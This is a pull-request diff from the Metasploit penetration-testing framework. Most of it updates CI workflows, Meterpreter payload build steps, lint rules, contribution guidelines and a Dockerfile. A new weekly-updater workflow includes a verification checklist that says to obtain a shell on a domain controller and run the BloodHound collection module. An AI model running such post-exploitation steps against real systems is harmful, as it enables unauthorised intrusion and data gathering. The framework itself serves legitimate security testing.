Merge pull request #20419 from OJ/feature/malleable-c2

Initial support for Malleable C2 Profiles in HTTP Meterpreter
Change MALLEABLEC2 option type to OptPath
2026-04-01 08:46:50 -04:00 · 2026-03-27 14:44:46 +01:00 · 2026-03-27 14:43:49 +01:00 · 2026-03-22 14:20:59 +10:00 · 2026-03-22 13:48:26 +10:00 · 2026-03-22 09:50:18 +10:00
5862 changed files with 284524 additions and 206015 deletions
@@ -63,21 +63,23 @@ jobs:
      fail-fast: false
      matrix:
        os:
-          - windows-2019
-          - ubuntu-20.04
+          - windows-2022
+          - ubuntu-latest
        ruby:
-          - 3.1.5
+          - '3.4'
        include:
          # Powershell
-          - { command_shell: { name: powershell }, os: windows-2019 }
-          - { command_shell: { name: powershell }, os: windows-2022 }
+          - { command_shell: { name: powershell }, ruby: '3.4', os: windows-2022 }
+          - { command_shell: { name: powershell }, ruby: '3.4', os: windows-2025 }

          # Linux
-          - { command_shell: { name: linux }, os: ubuntu-20.04 }
+          - { command_shell: { name: linux }, ruby: '3.4', os: ubuntu-latest }

          # CMD
-          - { command_shell: { name: cmd }, os: windows-2019 }
-          - { command_shell: { name: cmd }, os: windows-2022 }
+          - { command_shell: { name: cmd }, ruby: '3.4', os: windows-2022 }
+
+          # TODO: Tests currently fail:
+          # - { command_shell: { name: cmd }, ruby: '3.4', os: windows-2025 }

    runs-on: ${{ matrix.os }}

@@ -126,10 +128,16 @@ jobs:
        with:
          path: metasploit-framework

-      - name: Setup Ruby
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
+      - name: Setup '${{ matrix.ruby }}' Ruby
+        # Skip for now to ensure CI passes on Windows server 2025 powershell tests
+        #env:
+        #  BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
        with:
          ruby-version: ${{ matrix.ruby }}
          bundler-cache: true
@@ -175,13 +183,19 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
-          ruby-version: '${{ matrix.ruby }}'
+          # use the default version from the .ruby-version file
+          ruby-version: '.ruby-version'
          bundler-cache: true
          cache-version: 4

@@ -45,6 +45,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        uses: ruby/setup-ruby@v1
        with:
@@ -33,6 +33,8 @@ on:
      - 'metsploit-framework.gemspec'
      - 'Gemfile.lock'
      - '**/**ldap**'
+      - 'lib/metasploit/framework/tcp/**'
+      - 'lib/metasploit/framework/login_scanner/**'
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
@@ -72,6 +74,11 @@ jobs:
          docker compose build
          docker compose up --wait -d

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -121,6 +128,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.1'
+          - '3.2'

    name: Lint msftidy
    steps:
@@ -82,6 +82,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -138,6 +143,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -80,6 +80,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -137,6 +142,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -33,6 +33,8 @@ on:
      - 'metsploit-framework.gemspec'
      - 'Gemfile.lock'
      - '**/**postgres**'
+      - 'lib/metasploit/framework/tcp/**'
+      - 'lib/metasploit/framework/login_scanner/**'
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
@@ -82,6 +84,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -139,6 +146,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -0,0 +1,69 @@
+name: Shared Gem Verify
+on:
+  workflow_call:
+    inputs:
+      test_commands:
+        description: 'Test commands'
+        required: false
+        default: "bundle exec rspec"
+        type: string
+      dependencies:
+        description: 'Array of system dependencies to install'
+        required: false
+        default: "[]"
+        type: string
+
+jobs:
+  test:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: false
+      matrix:
+        ruby:
+          - '3.2'
+          - '3.3'
+          - '3.4'
+        os:
+          - ubuntu-22.04
+          - ubuntu-24.04
+          - ubuntu-latest
+          - windows-2022
+          - windows-2025
+          - macos-13
+
+    env:
+      RAILS_ENV: test
+
+    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        if: ${{ inputs.dependencies != '[]' && !contains(matrix.os, 'macos') && !contains(matrix.os, 'windows') }}
+        run: |
+          dependencies=$(echo '${{ inputs.dependencies }}' | jq -r '.[]')
+          for dep in $dependencies; do
+            sudo apt-get -y --no-install-recommends install "$dep"
+          done
+        shell: bash
+
+      - name: Install system dependencies (Windows)
+        if: ${{ contains(matrix.os, 'windows') && inputs.dependencies != '[]' }}
+        run: |
+          $dependencies = (echo '${{ inputs.dependencies }}' | jq -r '.[]')
+          foreach ($dep in $dependencies) {
+            choco install $dep -y
+          }
+        shell: pwsh
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Setup Ruby
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+
+      - name: Test
+        run: ${{ inputs.test_commands }}
@@ -0,0 +1,90 @@
+name: Shared Gem Verify Rails/PostgreSQL
+on:
+  workflow_call:
+    inputs:
+      test_commands:
+        description: 'Test commands'
+        required: false
+        default: "bundle exec rspec"
+        type: string
+      dependencies:
+        description: 'Array of system dependencies to install'
+        required: false
+        default: "[]"
+        type: string
+
+jobs:
+  test:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: false
+      matrix:
+        ruby:
+          - '3.2'
+          - '3.3'
+          - '3.4'
+        rails:
+          - '~> 7.0.0'
+          - '~> 7.1.0'
+          - '~> 7.2.0'
+        postgres:
+          - '9.6'
+          - '16.8'
+        os:
+          - ubuntu-latest
+
+    env:
+      RAILS_ENV: test
+
+    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - Rails ${{ matrix.rails }} - PostgreSQL ${{ matrix.postgres }}
+    steps:
+      - name: Install system dependencies
+        run: |
+          dependencies=$(echo '${{ inputs.dependencies }}' | jq -r '.[]')
+          for dep in $dependencies; do
+            sudo apt-get -y --no-install-recommends install "$dep"
+          done
+        shell: bash
+
+      - name: Set up PostgreSQL service
+        run: |
+          docker run --name postgres -d -p 5432:5432 \
+            -e POSTGRES_USER=postgres \
+            -e POSTGRES_PASSWORD=postgres \
+            --health-cmd="pg_isready" \
+            --health-interval="10s" \
+            --health-timeout="5s" \
+            --health-retries=5 \
+            postgres:${{ matrix.postgres }}
+
+      - name: Wait for PostgreSQL to be healthy
+        run: |
+          docker exec postgres sh -c 'until pg_isready -U postgres; do echo waiting for postgres; sleep 2; done; echo postgres is ready'
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Setup Ruby
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+
+      - name: Update Rails version
+        run: |
+          # Add the gem explicitly if it doesn't exist
+          if ! grep -q "gem ['\"]rails['\"]" Gemfile; then
+            echo 'gem "rails"' >> Gemfile          
+          fi
+          
+          # Ensure the gem is on the latest version
+          ruby -pi -e "gsub(/gem ['\"]rails['\"](, *['\"].*['\"])?/, \"gem 'rails', '${{ matrix.rails }}'\")" Gemfile
+          bundle update
+          bundle install
+          bundle show rails
+        shell: bash
+
+      - name: Test
+        run: ${{ inputs.test_commands }}
@@ -30,11 +30,11 @@ on:
        type: boolean

 jobs:
-  # Compile Java Meterpreter via docker if required, we can't always do this on the
+  # Compile the Meterpreter payloads via docker if required, we can't always do this on the
  # host environment (i.e. for macos). So it instead gets compiled first on a linux
  # host, then the artifacts are copied back to the host later
-  java_meterpreter_compilation:
-    name: Compile Java Meterpreter
+  meterpreter_compilation:
+    name: Compile Meterpreter
    runs-on: ubuntu-latest
    if: ${{ inputs.build_metasploit_payloads }}

@@ -46,34 +46,35 @@ jobs:
          path: metasploit-payloads
          ref: ${{ inputs.metasploit_payloads_commit }}

-      - name: Build Java and Android payloads
+      - name: Build Meterpreter payloads
        run: |
-          mkdir $(pwd)/java-artifacts
-          docker run --rm -w "$(pwd)" -v "$(pwd):$(pwd)" rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "set -x && cd metasploit-payloads/java && mvn package -Dandroid.sdk.path=/usr/local/android-sdk -Dandroid.release=true -Ddeploy.path=../../java-artifacts -Dmaven.test.skip=true -P deploy && mvn -Dmaven.test.skip=true -Ddeploy.path=../../java-artifacts -P deploy package"
+          mkdir $(pwd)/meterpreter-artifacts
+          docker run --rm -w $(pwd) -v $(pwd):$(pwd) rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "cd metasploit-payloads/gem && rake create_dir && rake win_copy && rake php_prep && rake java_prep && rake python_prep && rake create_manifest && rake build"
+          cp $(pwd)/metasploit-payloads/gem/pkg/metasploit-payloads-* $(pwd)/meterpreter-artifacts

-      - name: Store Java artifacts
+      - name: Store Meterpreter artifacts
        uses: actions/upload-artifact@v4
        with:
-          name: java-artifacts
-          path: java-artifacts
+          name: meterpreter-artifacts
+          path: meterpreter-artifacts

  # Run all test individually, note there is a separate final job for aggregating the test results
  test:
-    needs: java_meterpreter_compilation
-    if: always() && (needs.java_meterpreter_compilation.result == 'success' || needs.java_meterpreter_compilation.result == 'skipped')
+    needs: meterpreter_compilation
+    if: always() && (needs.meterpreter_compilation.result == 'success' || needs.meterpreter_compilation.result == 'skipped')

    strategy:
      fail-fast: false
      matrix:
        os:
          - macos-13
-          - windows-2019
-          - ubuntu-20.04
+          - windows-2022
+          - ubuntu-latest
        ruby:
-          - 3.1.5
+          - '3.4'
        meterpreter:
          # Python
-          - { name: python, runtime_version: 3.6 }
+          - { name: python, runtime_version: 3.8 }
          - { name: python, runtime_version: 3.11 }

          # Java
@@ -86,12 +87,13 @@ jobs:
          - { name: php, runtime_version: 8.3 }
        include:
          # Windows Meterpreter
-          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
-          - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
+          - { meterpreter: { name: windows_meterpreter }, ruby: '3.4', os: windows-2022 }
+          # TODO: Screenshotting behavior fails:
+          # - { meterpreter: { name: windows_meterpreter }, ruby: '3.4', os: windows-2025 }

          # Mettle
          - { meterpreter: { name: mettle }, os: macos-13 }
-          - { meterpreter: { name: mettle }, os: ubuntu-20.04 }
+          - { meterpreter: { name: mettle }, os: ubuntu-latest }

    runs-on: ${{ matrix.os }}

@@ -189,12 +191,19 @@ jobs:
          path: metasploit-framework
          ref: ${{ inputs.metasploit_framework_commit }}

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
+          # Introduces flakiness when downloading zlib etc: https://github.com/sparklemotion/nokogiri/issues/3521
+          # BUNDLE_FORCE_RUBY_PLATFORM: true
          # Required for macos13 pg gem compilation
          PKG_CONFIG_PATH: "/usr/local/opt/libpq/lib/pkgconfig"
-        uses: ruby/setup-ruby@v1
+        # Pinned to avoid Windows compilation failure with nokogiri
+        uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
        with:
          ruby-version: ${{ matrix.ruby }}
          bundler-cache: true
@@ -208,28 +217,28 @@ jobs:
        working-directory: metasploit-framework

      - uses: actions/download-artifact@v4
-        name: Download Java meterpreter
-        id: download_java_meterpreter
-        if: ${{ matrix.meterpreter.name == 'java' && inputs.build_metasploit_payloads }}
+        name: Download Meterpreter
+        id: download_meterpreter
+        if: ${{ matrix.meterpreter.name != 'mettle' && inputs.build_metasploit_payloads }}
        with:
          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
          path: raw-data

-      - name: Extract Java Meterpreter (Unix)
-        if: ${{ matrix.meterpreter.name == 'java' && runner.os != 'Windows' && inputs.build_metasploit_payloads }}
+      - name: Extract Meterpreter (Unix)
+        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' && inputs.build_metasploit_payloads }}
        shell: bash
        run: |
          set -x
-          download_path=${{steps.download_java_meterpreter.outputs.download-path}}
-          cp -r  $download_path/java-artifacts/data/* ./metasploit-framework/data
+          download_path=${{steps.download_meterpreter.outputs.download-path}}
+          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework

-      - name: Extract Java Meterpreter (Windows)
-        if: ${{ matrix.meterpreter.name == 'java' && runner.os == 'Windows' && inputs.build_metasploit_payloads }}
+      - name: Extract Meterpreter (Windows)
+        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os == 'Windows' && inputs.build_metasploit_payloads }}
        shell: bash
        run: |
          set -x
-          download_path=$(cygpath -u '${{steps.download_java_meterpreter.outputs.download-path}}')
-          cp -r  $download_path/java-artifacts/data/* ./metasploit-framework/data
+          download_path=$(cygpath -u '${{steps.download_meterpreter.outputs.download-path}}')
+          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework

      - name: Install mettle gem
        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
@@ -250,32 +259,6 @@ jobs:
          path: metasploit-payloads
          ref: ${{ inputs.metasploit_payloads_commit }}

-      - name: Get metasploit-payloads version
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        shell: bash
-        run: echo "METASPLOIT_PAYLOADS_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" gem/lib/metasploit-payloads/version.rb)" | tee -a $GITHUB_ENV
-        working-directory: metasploit-payloads
-
-      - name: Build metasploit-payloads gem
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        run: gem build ./gem/metasploit-payloads.gemspec
-        working-directory: metasploit-payloads
-
-      - name: Copy metasploit-payloads gem into metasploit-framework
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        shell: bash
-        run: cp ../metasploit-payloads/metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem .
-        working-directory: metasploit-framework
-
-      - name: Install metasploit-payloads gem
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        run: |
-          bundle exec gem install metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem
-          bundle config unset deployment
-          bundle update metasploit-payloads
-          bundle install
-        working-directory: metasploit-framework
-
      - name: Build Windows payloads via Visual Studio 2019 Build (Windows)
        shell: cmd
        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2019' && inputs.build_metasploit_payloads }}
@@ -294,12 +277,48 @@ jobs:
          make.bat
        working-directory: metasploit-payloads

-      - name: Build PHP, Python and Windows payloads
-        if: ${{ (matrix.meterpreter.name == 'php' || matrix.meterpreter.name == 'python' || runner.os == 'Windows') && inputs.build_metasploit_payloads }}
+      - name: Build Windows payloads via Visual Studio 2025 Build (Windows)
+        shell: cmd
+        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2025' && inputs.build_metasploit_payloads }}
        run: |
-          make install-php install-python install-windows
+          cd c/meterpreter
+          git submodule init && git submodule update
+          make.bat
        working-directory: metasploit-payloads

+      - name: Get metasploit-payloads version
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        shell: bash
+        run: echo "METASPLOIT_PAYLOADS_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" gem/lib/metasploit-payloads/version.rb)" | tee -a $GITHUB_ENV
+        working-directory: metasploit-payloads
+
+      - name: Install metasploit-payloads gem
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        run: |
+          bundle exec gem install metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem
+        working-directory: metasploit-framework
+
+      - name: Remove metasploit-payloads version from metasploit-framework.gemspec
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' }}
+        run: |
+          ruby -pi -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
+        working-directory: metasploit-framework
+
+      - name: Remove metasploit-payloads version from metasploit-framework.gemspec (Windows)
+        if: ${{ inputs.build_metasploit_payloads && (runner.os == 'Windows' && matrix.meterpreter.name != 'windows_meterpreter') && matrix.meterpreter.name != 'mettle' }}
+        shell: cmd
+        run: |
+          ruby -pi.bak -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
+        working-directory: metasploit-framework
+
+      - name: Bundle update/install metasploit-payloads gem
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        run: |
+          bundle config unset deployment
+          bundle update metasploit-payloads
+          bundle install
+        working-directory: metasploit-framework
+
      - name: Acceptance
        env:
          SPEC_HELPER_LOAD_METASPLOIT: false
@@ -342,11 +361,16 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
+        uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
        with:
          ruby-version: '3.3'
          bundler-cache: true
@@ -74,6 +74,11 @@ jobs:
          docker compose build
          docker compose up --wait -d

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -143,6 +148,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -60,16 +60,14 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.1'
          - '3.2'
          - '3.3'
-          - '3.4.0-preview2'
+          - '3.4'
        os:
-          - ubuntu-20.04
          - ubuntu-latest
        include:
          - os: ubuntu-latest
-            ruby: '3.1'
+            ruby: '3.2'
            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
@@ -90,6 +88,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -0,0 +1,98 @@
+name: Weekly Data and External Tool Updater
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: write
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: write
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  schedule:
+    # Run once a week (e.g., every Monday at 01:00 UTC)
+    - cron: '0 1 * * 1'
+  workflow_dispatch: # Allows manual triggering from the Actions tab
+
+jobs:
+  update-data-files:
+    runs-on: ubuntu-latest
+
+    if: github.repository_owner == 'rapid7'
+
+    env:
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+
+      - uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: Run Ruby updater scripts
+        run: |
+          ruby tools/dev/update_wordpress_vulnerabilities.rb
+          ruby tools/dev/update_joomla_components.rb
+          ruby tools/dev/update_user_agent_strings.rb
+          ruby tools/dev/check_external_scripts.rb -u
+      - name: Remove vendor folder # prevent git from adding it
+        run: rm -rf vendor
+
+      - name: Create Pull Request
+        uses: peter-evans/create-pull-request@v7
+        with:
+          token: ${{ secrets.GITHUB_TOKEN }}
+          commit-message: Update report
+          base: master
+          branch: weekly-updates
+          committer: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
+          author: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
+          title: "Weekly Data Update"
+          draft: false
+          body: |
+            This pull request was created automatically by a GitHub Action to update data files and external scripts.
+            The following tools were run:
+            - ruby tools/dev/update_wordpress_vulnerabilities.rb
+            - ruby tools/dev/update_joomla_components.rb
+            - ruby tools/dev/update_user_agent_strings.rb
+            - ruby tools/dev/check_external_scripts.rb -u
+            ## Verification
+            ### Wordpress/Joomla Files
+            - [ ] Do a sanity check, do the additions look legit?
+            - [ ] Start `msfconsole`
+            - [ ] `use modules/auxiliary/scanner/http/wordpress_scanner`
+            - [ ] **Verify** it runs
+            ### JTR Files
+            - [ ] Do a sanity check, do the additions look legit?
+            - [ ] See https://docs.metasploit.com/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#example-hashes for hashes and cracking
+            ### SharpHound
+            - [ ] Start `msfconsole`
+            - [ ] get a shell on a DC or box connected to a dc
+            - [ ] `use post/windows/gather/bloodhound`
+            - [ ] `set session`
+            - [ ] `run`
+            - [ ] **Verify** it runs w/o erroring
+            - [ ] `set method disk`
+            - [ ] **Verify** it runs w/o erroring
@@ -23,12 +23,10 @@ require:
  - ./lib/rubocop/cop/lint/deprecated_gem_version.rb
  - ./lib/rubocop/cop/lint/module_enforce_notes.rb
  - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
+  - ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb

 Layout/SpaceBeforeBrackets:
-  Description: >-
-    Disabled as it generates invalid code:
-      https://github.com/rubocop-hq/rubocop/issues/9499
-  Enabled: false
+  Enabled: true

 Lint/AmbiguousAssignment:
  Enabled: true
@@ -116,6 +114,12 @@ Style/DocumentDynamicEvalDefinition:
 Style/EndlessMethod:
  Enabled: true

+Style/FormatStringToken:
+  Enabled: true
+  Exclude:
+  # We aren't ready to enable this for modules yet
+    - 'modules/**/*'
+
 Style/HashExcept:
  Enabled: true

@@ -155,9 +159,26 @@ Style/RedundantAssignment:
    and return expression
  Enabled: false

+Style/RedundantParentheses:
+  Description: >-
+    Disabled as it sometimes improves the readability of code
+  Enabled: false
+
+Style/RedundantRegexpArgument:
+  Enabled: true
+  Exclude:
+  # We aren't ready to enable this for modules yet
+    - 'modules/**/*'
+
 Style/SwapValues:
  Enabled: false

+Layout/LineContinuationLeadingSpace:
+  Description: >-
+    Disabled as it sometimes improves the readability of code having leading spaces
+    for indented code strings.
+  Enabled: false
+
 Layout/ModuleHashOnNewLine:
  Enabled: true

@@ -652,3 +673,6 @@ Style/UnpackFirst:
    Disabling to make it easier to copy/paste `unpack('h*')` expressions from code
    into a debugging REPL.
  Enabled: false
+
+Lint/DetectMetadataTrailingLeadingWhitespace:
+  Enabled: true
@@ -1 +1 @@
-3.2.5
+3.3.8
@@ -22,6 +22,8 @@ Once you have finished your new module and tested it locally to ensure it's work
 Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
 will be closed. We need to ensure the code we're adding to master is written to a high standard.

+## Expedited Module Creation Process
+We strive to respect the community that has given us so much, so in the odd situation where we get multiple submissions for the same vulnerability, generally we will work with the first person who assigns themselves to the issue or the first person that submits a good-faith PR.  A good-faith PR might not even work, but it will show that the author is working their way toward a solution.  Despite this general rule, there are rare circumstances where we may ask a contributor to step aside or allow a committer to take the lead on the creation of a new module if a complete and working module with documents has not already been submitted.  This kind of expedited module creation process comes up infrequently, and usually it involves high-profile or high priority modules that we have marked internally as time-critical: think KEV list, active exploitation campaigns, CISA announcements, etc.  In those cases, we may ask a contributor that is assigned to the issue or who has submitted an incomplete module to allow a committer to take over an issue or a module PR in the interest of getting a module out quickly.  If a contributor has submitted an incomplete module, they will remain as a co-author of the module and we may build directly onto the PR they submitted, leaving the original commits in the tree.  We sincerely hope that the original author will remain involved in this expedited module creation process.  We would appreciate testing, critiquing, and any assistance that can be offered.  If the module is complete but requires minor changes, we may ask the contributor to allow us to take over testing/verification and make these minor changes without asking so we can land the module as quickly as possible.  In these cases of minor code changes, the authorship of the module will remain unchanged.  We hope everyone involved in this expedited module creation process continues to feel valued and appreciated.

 ### Code Contribution Do's & Don'ts:

@@ -40,13 +42,18 @@ Keeping the following in mind gives your contribution the best chance of landing
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
-* **Do** list [verification steps] so your code is testable.
+* **Do** test your code.
+* **Do** list [verification steps] so committers can test your code.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
+* **Don't** include sensitive information in your PR (including externally-routable IP addresses in documentation).
+* **Don't** PR untested/unvalidated code you copy/pasted from the internet.
+* **Don't** PR untested/unvalidated code you copy/pasted from AI or LLM.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
 * **Don't** post questions in older closed PRs.

 #### <u>New Modules</u>
+* **Do** check the issue tracker to see if there is a `suggestion-module` issue for the module you want to write, and assign yourself to it if there is.
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
 * **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2020, Rapid7, Inc.
+Copyright (C) 2006-2025, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -1,7 +1,7 @@
-FROM ruby:3.2.5-alpine3.20 AS builder
+FROM ruby:3.3.8-alpine3.21 AS builder
 LABEL maintainer="Rapid7"

-ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
+ARG BUNDLER_CONFIG_ARGS="set force_ruby_platform 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
 ARG BUNDLER_FORCE_CLEAN="true"
 ENV APP_HOME=/usr/src/metasploit-framework
